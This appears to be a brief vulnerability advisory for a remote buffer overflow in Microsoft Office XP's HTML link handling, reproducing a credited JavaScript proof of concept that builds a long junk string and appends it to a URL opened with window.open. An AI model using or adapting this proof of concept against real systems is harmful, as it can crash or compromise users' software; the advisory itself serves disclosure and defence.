|
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
The following proof of concept has been supplied by Rafel Ivgi: <Script> var mylongstring,myjunk; mylongstring =""; myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbbb"; for(c=1;c<5000;c++) { mylongstring = mylongstring + myjunk; } window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring); </script> |
|
|
Privacy Statement |
